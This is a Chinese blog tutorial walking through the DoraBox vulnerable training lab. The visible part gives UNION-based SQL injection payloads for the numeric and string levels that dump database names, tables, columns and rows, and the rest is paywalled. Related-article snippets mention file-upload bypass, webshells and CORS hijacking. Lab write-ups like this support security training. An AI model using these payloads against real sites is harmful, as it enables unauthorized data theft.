哆啦盒(DoraBox)靶场通过教程

最新推荐文章于 2024-08-01 10:03:26 发布
最新推荐文章于 2024-08-01 10:03:26 发布
阅读量4k 收藏 18
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuandao_ahfengren/article/details/105782760
版权
本文详细介绍了DoraBox靶场中涉及的各种安全漏洞,包括Sql注入(数字型、字符型、搜索型)、Xss跨站(反射型、存储型、DOM型)、CSRF、文件包含(任意文件包含、目录限制文件包含)、文件上传等,并提供了相应的攻击与防御方法,帮助读者理解并提升网络安全技能。
摘要由CSDN通过智能技术生成

Sql注入

直接开始第一关,sql注入数字型

源码中id是htmlspecialchars过滤的,过滤是过滤单引号,双引号,尖括号和&的,但是过滤的是html实体并不会影响我们的操作

-1 union select 1,2,3

爆数据库:-1 union select 1,user(),database()

爆表:-1 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

爆列名:-1 UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name='news'

爆值:-1 UNION SELECT 1,2,concat_ws('|',id,title,content) from news

下一关

Sql注入字符型

这关和之前是差不多的,就是要闭合一下单引号即可

DoraBox' and '1'='2' union select 1,2,3'&submit=submit

爆表:DoraBox' and '1'='2' UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--

DoraBox' and '1'='2' UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name='news'--

DoraBox' and '1'='2' UNION SELECT 1,2,concat_ws('|',id,title,content) from news--

下一关

Sql注入搜索型

这里百分号和单引号都需要闭合

最低0.47元/天 解锁文章
玄道网安
关注
【漏洞挖掘】——38、DoraBox中CORS靶场
Fly_鹏程万里
06-06 62
根据需要配置Access-Control-Allow,例如配置信任域而不是使用*来运行所有的域访问。
DoraBox靶场(二)CSRF
Lorezon的博客
03-17 651
JSONP劫持
浅析CSRF跨域读取型漏洞之CORS
记录学习,一起进步
03-07 879
浅析CSRF跨域读取型漏洞之CORS
蜜罐溯源以及蜜罐HFish的使用
最新发布
2301_80115097的博客
08-01 1065
蜜罐技术本质上是一种对攻击方进行欺骗的技术,通过布置一些作为诱饵的主机、网络服务或者信息,诱使攻击方对它们实施攻击,从而可以对攻击行为进行捕获和分析,了解攻击方所使用的工具与方法,推测攻击意图和动机,能够让防御方清晰地了解他们所面对的安全威胁,并通过技术和管理手段来增强实际系统的安全防护能力。
dorabox靶场writeup
weixin_45705209的博客
08-22 1190
靶场搭建 这里我直接采用Windows下的wamp集成环境,直接将靶场源码下载到本地,解压到网站根目录即可。 网站源码下载地址:https://github.com/Acmesec/DoraBox 数据库的配置,修改conn.php的数据库连接账号及密码,在本地数据库创建一个pentest数据库,将pentest.sql文件导入到数据库中,在创建的库中执行source D:/wamp/www/DoraBox-master/pentest.sql即可,到这里靶场就搭建完毕。 作者也在github上有制作了do
配合小皮系统搭建Droabox靶场
weixin_73970836的博客
08-14 327
四,打开刚刚放进小皮系统WWW目录下的哆啦盒,找到conn.php,以记事本形式打开,修改成小皮系统的账户名和密码,和数据库,保存。五,浏览器打开http://127.0.0.1/DoraBox-master/即可。二,启动小皮数据库,创建一个数据库,设置密码及用户。一,将下载好的哆啦盒放进小皮系统的WWW目录下。三,导入在哆啦盒文件下的pentest.sql。无需使用命令行,即可搭建!
哆啦靶场 SSRF、XXE、XSS、XSS学习、SQL部分通关教程
玄道的网安博客
04-26 3450
SSRF漏洞靶场 来到SSRF首页 看看file_get_content.php 这应该就是file_get_content要包含的文件了 假设我们本地搭建一个1.php文件 然后包含这个文件即可 为什么不是php形式的样子,而是html的形式,因为htmlentities函数把包含进来的转换成html实体了 第二关 输入端口445,账号秘密都是r...
DoraBox-master综合性靶机练习
滕财然的博客
05-18 1980
文章目录1、SQL注入sql数字型:sql字符型:sql搜索型:2、XSS跨站脚本攻击XSS反射型:XSS存储型:XSS DOM型:3、CSRFJSONP劫持:CORS跨域资源读取:4、文件包含任意文件包含:目录限制文件包含:5、文件上传任意文件上传:JS限制文件上传MIME限制文件上传扩展名限制文件上传内容限制文件上传6、命令执行任意代码执行:任意命令执行:7、SSRF8、其它条件竞争-支付条件竞争-上传任意文件读取XXE 1、SQL注入 攻击者可以提交一段精心构造的数据库查询代码,根据返回的结果,获得
哆啦靶场学习笔记
5L2g556F5ZWl77yf
10-21 1132
文章目录sql注入数字型字符型搜索型XSS跨站反射 XSS 示例CSRFJSONP劫持 https://github.com/gh0stkey/DoraBox sql注入 数字型 注入流程 判断数字型注入 判断字段长度 联合注入 判断数字型注入 判断字段长度 在order by 4 的时候报错,而3不会,证明此表只有3个字段 ?id=1 and 1 = 2 order by 4 --+ 利用 union 定位数据库回显位置 ?id=1 and 1 = 2 union select 1,2,3
哆啦靶场文件上传部分教程
玄道的网安博客
04-25 1505
上传漏洞靶场 这里我们使用安装包直接安装 直接开始 发现是javascript限制,审查元素直接把onsubmit删除掉 上传成功,查看图片,ok了 PASS1 直接上传websheell,好像不行,看一下提示,也就是检查Content-Type,我们把它修改成图片形式,image/jpg 上传成功,查看图片即可访问我们上传的php代码 PASS2...
DoraBox靶场(一)SQL注入
Lorezon的博客
03-17 291
SQLi数字型 输入1 返回正常,并且出现查询使用的整条SQL语句: 常规拼接and 1=1返回正常。 拼接and 1=2页面异常。 判断字段长。 3正常,4异常,字段为3。 判断回显点。 查询数据库名称。 查询表名 查值。 SQLi字符型 字符型和数字型的区别就是有无单引号来闭合,当没有单引号闭合时候,输出没有结果。 单引号进行闭合 判断出回显点接下来就和数字型一样的步骤了,注意闭...
多啦靶场安装
SunJ3t的菠萝屋
06-29 415
多啦一键式靶场环境,包含上传漏洞,SSRF 漏洞,XXE 漏洞,XSS 漏洞,SQL 注入漏洞等靶场环境。
DoraBox靶场(四)文件上传
Lorezon的博客
03-20 301
任意文件上传 这关没啥说的,什么文件都可以。 JS限制文件上传 上传php文件,提示不允许上传,并给出了允许上传的文件类型。 先上传jpg文件,再抓包拦截改文件类型。 成功上传了php,蚁剑连接。 MIME限制上传 上传php文件,显示文件类型不正确。 经过测试,jpg文件可以成功上传。 抓包看php和jpg有什么不同。 两者的Content-Type值不相同。 把php的Content-...
DoraBox-SQL注入篇1–数字型
qq_45780190的博客
09-18 1195
DoraBox - 掌握常见漏洞攻防 SQL注入篇1–数字型 1.判断数据库有几个 输入1查询 输入2查询 输入3查询 发现再也没有数据库查询出来,也就代表着数据库只有两个 2.判断是否存在注入,注入是字符型还是数字型(其实我们已经知道注入是数字类型,但为了更好的学习,按步骤进行学习) 当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。 接着我们分别输入 1 and 1=1 1 and 1=2 输入字符类型时可以知
靶场通关 | Tomato靶机通关秘籍~
鱼溯的博客
10-20 1191
靶场通关 | Tomato靶机通关秘籍~
搭建DoraBox 2021/9/7
cutjgh的博客
09-07 932
一.下载 下载地址: https://github.com/0verSp4ce/DoraBox 步骤: 先下好数据包 2.将压缩包解压到 phpStudy\PHPTutorial\WWW 目录下 要是弄错位置了,可能就会出现这种情况,所以一定是解压在www目录下 3.修改数据 4.启动phpstudy,导入数据库 5.点击“导入”后,在确保php是运行的情况下访问http://127.0.0.1/DoraBox-master/ 安装完成 ...
DoraBox实战】————5、文件上传分析与研究
Fly_鹏程万里
08-08 772
文件上传漏洞 “文件上传”功能已经成为现在Web应用的一种常见需求,它不但有助于提供业务效率(例如:企业内部文件共享),更有助于优化用户的体验(例如:上传视频、图片、头像等各种其他类型的文件)。“文件上传”功能一方面带来了良好的体验,另一方面也带来的“安全问题”。目前文件上传漏洞已经成为web安全中经常利用到的一种漏洞形式,对于缺少安全防护的web应用,攻击者可以利用提供的文件上传功能将恶意...
SRC挖掘|Cors跨域漏洞|DoraBox漏洞利用
qq_60115503的博客
04-18 3938
简介 网站如果存在CORS跨域漏洞就会有用户敏感数据被窃取的风险 跨域资源共享(CORS)是一种浏览器机制,可实现对位于给定域外部的资源的受控访问,它扩展了同源策略(SOP)并增加了灵活性,但是,如果网站的CORS策略配置和实施不当,他也可能带来基于跨域的攻击,CORS并不是针对跨域攻击[例如跨站点请求伪造CSRF]的保护措施 同源策略 这里我们必须要了解一下同源策略:同源策略是一种限制性的跨域规范,它限制了网站与源域之外的资源进行交互的能力,起源于多年前的策略是针对潜在恶意跨域交互(例如 一个网站
kali2021.3安装DVWA靶场教程
"kali2021.3安装dvwa靶场" 在本文中,我们将详细探讨如何在Kali Linux 2021.3版本上安装DVWA(Damn Vulnerable Web Application)靶场,这对于初学者进行Web渗透测试是非常有帮助的。DVWA是一个开源的、易受攻击的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值